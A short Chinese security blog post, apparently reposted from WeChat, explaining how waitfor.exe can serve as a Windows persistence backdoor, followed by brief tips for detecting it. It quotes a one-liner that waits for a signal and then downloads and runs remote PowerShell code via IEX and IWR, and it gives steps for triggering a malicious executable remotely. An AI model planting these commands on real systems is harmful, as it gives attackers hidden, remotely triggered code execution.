实现原理
waitfor 后门权限维持最初来之Daniel Bohannon @danielhbohannon在twitter上分享了他的利用思路:将waitfor接收信号后的操作设置为从远程服务器下载powershell代码并执行。地址如下:
Waitfor is great for persistence
waitfor persist && PowerShell IEX (IWR https://t.co/YtCtEreRfQ).Content
waitfor /s 127.0.0.1 /si persist pic.twitter.com/leDIYVy4ZA— Daniel Bohannon (@danielhbohannon) June 7, 2017
Waitfor.exe简介是用来同步网络中计算机,可以发送或等待系统上的信号
Windows Server 2003Windows VistaWindows XPWindows Server 2008Windows 7Windows Server 2003 with SP2Windows Server 2003 R2Windows Server 2008 R2Windows Server 2000Windows Server 2012Windows Server 2003 with SP1Windows 8Windows 10其他Server系统未测试,理论上支持
操作步骤
waitfor:在系统上发送或等待信号。waitfor可用于跨网络同步计算机。
waitfor test && c:\windows\system32calc.exe 表示接收信号成功后执行恶意exe程序
waitfor /s 127.0.0.1 /si test
或
waitfor /s 127.0.0.1 /u test /p 123456 /si test //向机器192.168.1.10发送信息,让其执行恶意程序/s <Computer> 指定远程计算机的名称或IP地址,默认为本地计算机
/u [<Domain>]<user> 使用指定用户帐户的凭据运行脚本。默认是使用当前用户的凭据。
/p <Password> 指定/u参数中指定的用户帐户的密码。
/si 发送指定激活信号。
/t 指定等待信号的秒数。默认为无限期等待。
<SignalName> 指定等待或发送的信号,不区分大小写,长度不能超过225个字符
该方法的优点就是能主动激活,但是缺点也明显就是只能在同一网段才能接收和发送激活信号、服务器重启之后就不行了。
如何排查
留意后台进程waitfor.exe
对于后台的可疑进程cmd.exe和powershell.exe,可使用Process Explorer查看其启动
参考链接:https://mp.weixin.qq.com/s/g2niEfHd9smJrvpAHd9W-w
原文始发于微信公众号(贝雷帽SEC):【Tips+1】Windows持久化之waitfor
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论